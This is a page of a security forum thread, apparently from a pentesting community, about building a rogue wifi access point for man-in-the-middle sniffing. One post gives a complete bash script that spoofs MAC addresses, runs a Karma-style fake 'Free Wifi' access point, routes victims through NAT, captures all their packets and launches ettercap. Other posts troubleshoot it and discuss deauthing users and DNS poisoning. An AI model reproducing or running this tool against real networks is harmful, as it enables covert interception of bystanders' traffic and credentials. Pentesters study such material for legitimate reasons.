Page 7 of 14 FirstFirst ... 56789 ... LastLast
Results 61 to 70 of 137

Thread: Rogue Accesspoint + MitM Sniffing tutorial

  1. #61
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    I think its too complicated for newbies to be messing around,

    best way is not to post the script but to put into pastebin, only those that know with at least some understanding will use it

  2. #62
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Yes that is true indeed hm2075, my script is pure simplicity - but it could stand beside as an additional option for pentesters on the go.
    I don't know, nevertheless, it is so simple that one could easily add the necessary functions manually
    - Poul Wittig

  3. #63

    Default

    This is all I could do in 30 minutes, it should work as a skeleton for what you want to do, you could finish it if you like, sadly I have very little time today but I will see if tomorrow I can work on it or if you want you can improve your coding skills by finishing it, what do you think about my idea?

    Code:
    #!/bin/bash
    #=================================================
    #
    # FILE: mitmap.sh
    #
    # USAGE: ./mitmap.sh <options>
    #
    # DESCRIPTION: Script to lunch fake ap for Man In The Middle Attacks
    #
    # OPTIONS: Wireless car supported by Aircrack-ng for injection.
    #	   File with MAC addresses for filtering connection 
    #	   Madwifi Drives Patched with the DigiNinja Karma Patch
    # BUGS: Only has been tested with Atheros, Realteck L8187 and Ralink 2750 cards.
    # NOTES: Latest version of SVN of Aircrack-ng as whell as latest drivers must me used.
    # AUTHOR: Deathray and carlos_perez(at)darkoperator.com
    # VERSION: 0.1
    # CREATED: 12/29/08 
    # REVISION:
    #=================================================
    #Initialize Wireless interface variable
    IW=
    #Initialize interface to be routed to variable
    IE=
    #Initialize mode variable
    MODE=
    #Initilize SSID variable
    SSID="Free Wifi"
    #Initialize Macfilter file Variable
    FILTER="/noexist"
    #Variable with number of arguments passed to the script
    NUM=$#
    #Variable with log file location for trobleshooting
    LOGFILE=/root/mitmap.log
    #Variable for log folder
    LOGFOLDER="/root/"
    A1="ath0"
    #Variable for dhcpd configuration file
    DHCPDCONF="/etc/dhcpd.conf"
    #Capture crtl-c and it will kill aproceed to clean up any process left 
    trap cleanup INT
    #Usage funtion for printing the help message
    function usage ()
    {
    	echo "Scritp for launching Fake AP to perform Man in The Middle Attack"
    	echo "Based on scritp and Tutorial by Deathrey at http://forums.remote-exploit.org"
    	echo "Usage:"
    	echo "./mitmap.sh -m <mode> -i <wireless interface> -o <internet interface> <options>"
    	echo ""
    	echo "Modes:"
    	echo ""
    	echo "ap		:Access Point using Airbase-ng"
    	echo "apf		:Access Point using Airbase-ng and MAC Filtering"
    	echo "apa		:Access Point using Digininja patched Madwifi kernel modules"
    	echo "apaf		:Access Point using Digininja patched Madwifi Kernel modules and MAC filtering"
    	echo ""
    	echo "Options:"
    	echo ""
    	echo "-s <ssid> 	:SSID to use for the Fake AP"
    	echo "-f <text file>	:text file containing MAC addresses to use as filter one per line"
    	echo "-d <dhcpd conf>	:Dhcpd configuration file"
    	echo "-h 		: This help message"
    }
    #Airbase-ng Karma style interface initialization
    function abngkinit ()
    {
    	if [ $IW == $A1 ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1 &
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    		sleep 2
    	else
    		ifconfig $IW up >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		airmon-ng start $IW >> $LOGFILE 2>&1 &
    		sleep 2
    	fi
    	modprobe tun	
    	echo -e "\033[1;32mstarting fake ap\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#specialy on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	#$IW = "at0"
    	sleep 15
    	#changing MTU size for Interface
    	echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m"
    	ifconfig at0 mtu 1400
    	IW="at0"
    
    }
    #Airbase-ng Karma style interface initialization with MAC Address Filtering
    function abngkinitfiltered ()
    {
    	if [ $IW == $A1 ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1 &
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    		sleep 2
    	else
    		ifconfig $IW up >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		airmon-ng start $IW >> $LOGFILE 2>&1 &
    		sleep 2
    	fi
    	modprobe tun	
    	echo -e "\033[1;32mstarting fake ap with filtering\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" --clients $FILTER $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#specialy on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	#$IW = "at0"
    	sleep 15
    	#changing MTU size for Interface
    	echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m"
    	ifconfig at0 mtu 1400
    	IW="at0"
    
    }
    #DigiNinja Atheros Karma interface initialization
    function mdwfkinit ()
    {
    	#Based on HD original karmetasploit scripts 
    	find /proc/net -name 'ath?' | sed -e 's/.*ath/ath/g' | xargs -i wlanconfig {} destroy
    	echo Master Mode: `wlanconfig ath0 create wlandev wifi0 wlanmode ap`
    	macchanger -A ath0
    
    	# Enable KARMA mode
    	iwpriv ath0 karma 1
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe Madwifi Drivers appear to not have the karma patch applied\033[1;37m"
    		echo -e "\033[1;31mhttp://www.darkoperator.com/madwifi-r3726-Karma-Aircrack-ng-patched-hdm-i386-1.lzm\033[1;37m"	
    		cleanup
    	else
    		echo -e "\033[1;32mStarting Atheros Card in Karma Mode Succesful\033[1;37m"
    	fi
    
    	# Configure the interface
    	iwconfig ath0 mode master
    	iwconfig ath0 channel 6
    	iwconfig ath0 essid "$SSID"
    	ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0
    
    }
    #DigiNinja Atheros Karma MAC Address Filtering
    function mdwfkinitfiltered ()
    {
    	if [ -e $FILTER ]; then
    		echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m"
    		for M in `cat $FILTER`; do
    			iwpriv ath0 addmac $M
    		done 
    		iwpriv ath0 maccmd 1
    	else
    		echo -e "\033[1;31mFilter File does not exist\033[1;37m"
    		echo $FILTER
    		#cleanup
    	fi
    }
    #Router with NAT Initialization
    function routerinit ()
    {
    	#Clear any dhcp leases that might have been left behind
    	echo > /var/state/dhcp/dhcpd.leases
    	#start dhcpd daemon with special configuration file
    	dhcpd -cf $DHCPDCONF $IW >> $LOGFILE 2>&1 &
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m"
    		cleanup
    	else
    		echo -e "\033[1;32mDHCPD started succesfully\033[1;37m"
    	fi
    	sleep 2
    	#capture all packets
    	echo -e "\033[1;32mStarting Packet capture to /root/apmitm.cap\033[1;37m"
    	tcpdump -ni $IW -s 0 -w /root/apmitm.cap >/dev/null 2>&1 &
    	route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    	iptables --flush
    	iptables --table nat --flush
    	iptables --delete-chain
    	iptables --table nat --delete-chain
    	iptables -P FORWARD ACCEPT
    	iptables -t nat -A POSTROUTING -o $IE -j MASQUERADE
    	echo "1" > /proc/sys/net/ipv4/ip_forward
    	ettercap -T -q -p -i $IW && cleanup
    }
    #Cleanup of all running processes
    function cleanup ()
    {
    	iptables --flush
    	iptables --table nat --flush
    	iptables --delete-chain
    	echo "0" > /proc/sys/net/ipv4/ip_forward
    	killall -9 dhcpd tcpdump airbase-ng >> $LOGFILE 2>&1 &
    	echo > /var/state/dhcp/dhcpd.leases
    	airmon-ng stop $IW >> $LOGFILE
    	if [ $MODE == "apa" ] || [$MODE == "apaf"; then
    		iwpriv ath0 maccmd 1 >> $LOGFILE 2>&1 &
    	fi 
    	exit 1
    
    }
    #--------------------MAIN-----------------------
    while getopts ":m:i:f:s:e:" options; do
      case $options in
        m ) MODE=$OPTARG;;
        i ) IW=$OPTARG;;
        f ) FILTER=$OPTARG;;
        s ) SSID=$OPTARG;;
        o ) IE=$OPTARG;;
        h ) usage;;
        \? ) usage
             exit 1;;
        * ) usage
              exit 1;;
    
      esac
    done
    if [[ -n "$MODE" && -n "$IW" ]]; then
    
    	case $MODE in
    	ap) abngkinit 
         		routerinit;;
    	apf) abngkinitfiltered
          		 routerinit;;
    	apa) mdwfkinit
    		routerinit;;	
    	apaf) mdwfkinit
    		mdwfkinitfiltered
    		routerinit;;	
    	esac
    else
    	usage
    fi

  4. #64
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Exciting to read as a lot of the stuff you have done I have always wondered how to do (: Although I am beginning to think that it may be a bit more complex than necessary. I think that there is more room for things to go wrong and it will be harder for people to troubleshoot when the script is as complex as it is. I don't know, I just think it will be a daunting task to get right. It would be great if it worked 100% for 99% of the people that actually will use it. But the question is how many people would bother?
    I'm thinking of upgrading the original to script to do something like this:

    Select rogue ap type:
    1 Offensive AP ( airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE & )
    2 Non-Offensive AP ( airbase-ng -e "$ESSID" -v $WIFACE & )
    3 Manual AP ( Configure airbase-ng options manually )

    If that were to be implemented in a simple way I would be happy :P
    - Poul Wittig

  5. #65

    Thumbs up

    Sorry for overdoing it bro, I tried to ajust it to my own needs, different needs diferent approaches, I tend to write scrips and options as if I'm in the middle of an engagement and thinking of anything that I might need. As you will later see it's not that complex, I do put lots of checks and balances in my scripts. One thing to tecomend is the clean up, why? It might bite you any settings in routing or in iptables as you switch attacks. Looking fordward to your final script.

  6. #66
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    excellent work there, maybe throw in our wireless key harvester


    hehehe


    anyway we still haven't got deauth a user and force to connect to our ap function yet, i think this has already been mentioned on the airbase-ng tickets

  7. #67
    Member
    Join Date
    Jun 2007
    Posts
    218

    Default

    Originally posted by BadKarmaPR

    echo "1" > /proc/sys/net/ipv4/ip_forward
    ettercap -T -q -p -i $IW && cleanup
    When ettercap starts up it turns off any kernel forwarding unless you use the -u option for unoffensive mode.

  8. #68
    Junior Member
    Join Date
    Sep 2008
    Posts
    85

    Default

    echo "1" > /proc/sys/net/ipv4/ip_forward

    could some please explain what this step does? i am trying to replicate the script manually and i'm not sure what to do for this step...
    patience is appreciated =]

  9. #69
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    If you want to use ettercap you should start it THEN enable forwarding. Ive had much better success doing that, becasue EC tries to forward for you then you can set everything right by echo "1" > /proc/sys/net/ipv4/ip_forward. I havnt tried the -u option yet hopefully that would do the same thing.

    For all those folks out there having trouble trying to run the script, if you open up bash and put in each line yourself it is much easier to see what is and isnt working, also start wireshark. If you wireshark your TUN interface and the NIC connected to the internet you can watch the packet transfers (or lack there of) and diagnose alot of the problems. Its all about doing one thing at a time and trial and error, everyone has different software/hardware so these scripts arent going to work for many of you with out a little modification.

    One last thing HM2075, ive been having some trouble getting that dnspoison program you used to work, are there any tuts online that you could point to? It seems a little crazy to have to setup a bind server to do a simple redirection, which is what Ive tried so far, and ettercaps dns spoof plugin is just crap.
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  10. #70

    Default

    Quote Originally Posted by benzslr123 View Post
    echo "1" > /proc/sys/net/ipv4/ip_forward

    could some please explain what this step does? i am trying to replicate the script manually and i'm not sure what to do for this step...
    Turns on IP forwarding on your box, so it will act as a router and forward packets.

Page 7 of 14 FirstFirst ... 56789 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •